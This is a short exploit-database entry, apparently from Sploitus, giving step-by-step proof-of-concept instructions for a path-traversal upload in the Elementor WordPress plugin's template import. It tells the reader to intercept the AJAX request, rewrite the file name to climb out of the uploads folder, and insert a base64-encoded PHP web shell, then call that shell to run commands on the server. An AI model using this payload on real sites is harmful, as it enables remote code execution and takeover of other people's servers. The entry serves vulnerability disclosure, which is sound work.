## https://sploitus.com/exploit?id=WPEX-ID:A6B3B14C-F06B-4506-9B88-854F155EBCA9
1. Edit a post in Elementor.
2. Import a template (folder icon on an Elementor block).
3. Pick any JSON file, and intercept the AJAX request.
4. Replace the file name with "/../../../../shell.php"
5. Replace the base64 contents (fileData) with "PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="
6. Visit /wp-content/shell.php?cmd=id to see the RCE.